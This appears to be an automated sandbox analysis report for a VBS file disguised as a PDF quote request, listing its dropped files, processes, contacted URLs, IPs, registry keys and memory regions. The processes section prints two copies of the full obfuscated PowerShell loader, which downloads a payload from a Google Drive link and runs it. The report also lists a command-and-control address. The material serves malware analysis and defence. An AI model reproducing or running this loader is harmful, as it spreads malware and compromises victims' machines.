Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Request for Proposal Quote_2414976#U00b7pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Rundturens.txt
|
ASCII text, with very long lines (8395), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1of3zyjg.0ug.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bldymjpg.vt4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdd1voxh.zxi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mybmtgmq.e1r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\gennemsgnings.Fas
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function
Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119,
$Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 '
GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman
BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6
Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid
GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor
Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU
InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn
n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/
.ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re
tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru
lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213
'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu
apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm
SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee
.athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml
Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud
lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes
');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun
aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti
Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl
mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf
rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo
Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl
Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB
khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao
iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver
kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker
FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas
iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai
Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands
(Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte
SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer
');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare
ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi
') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml
Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya
UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd
itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands
(Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr
Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi
estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases
') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak
er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt
SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands
(Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi
TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso
OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes
6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig
');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee
MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims
visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh
niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS
ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F
gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$
Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb
RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3
Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function
Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119,
$Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 '
GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman
BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6
Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid
GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor
Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU
InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn
n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/
.ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re
tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru
lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213
'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu
apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm
SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee
.athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml
Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud
lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes
');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun
aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti
Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl
mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf
rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo
Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl
Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB
khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao
iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver
kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker
FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas
iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai
Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands
(Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte
SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer
');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare
ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi
') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml
Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya
UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd
itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands
(Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr
Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi
estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases
') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak
er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt
SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands
(Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi
TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso
OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes
6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig
');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee
MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims
visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh
niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS
ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F
gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$
Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb
RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3
Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://24.199.107.111/index.php/927339792
|
24.199.107.111
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://drive.google.com/4
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com/
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://crl.microv
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://24.199.107.111/index.php/927339792r
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
drive.google.com
|
173.194.219.138
|
||
|
drive.usercontent.google.com
|
173.194.219.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
24.199.107.111
|
unknown
|
United States
|
|
|
|
173.194.219.138
|
drive.google.com
|
United States
|
||
|
173.194.219.132
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\???????????????????????????????????????
|
188E93
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1A0DA98C000
|
trusted library allocation
|
page read and write
|
|
|
|
8EE0000
|
direct allocation
|
page execute and read and write
|
|
|
|
54C0000
|
heap
|
page read and write
|
|
|
|
63BC000
|
trusted library allocation
|
page read and write
|
|
|
|
AE11000
|
direct allocation
|
page execute and read and write
|
|
|
|
759B000
|
stack
|
page read and write
|
||
|
2293BD00000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
89D5000
|
heap
|
page read and write
|
||
|
7ED0000
|
trusted library allocation
|
page read and write
|
||
|
15A10CA4000
|
heap
|
page read and write
|
||
|
2293BD5F000
|
heap
|
page read and write
|
||
|
7E50000
|
trusted library allocation
|
page read and write
|
||
|
7A4D000
|
heap
|
page read and write
|
||
|
2293BE45000
|
heap
|
page read and write
|
||
|
1A0C8BB9000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
1A0CC1D0000
|
trusted library allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
2293C132000
|
heap
|
page read and write
|
||
|
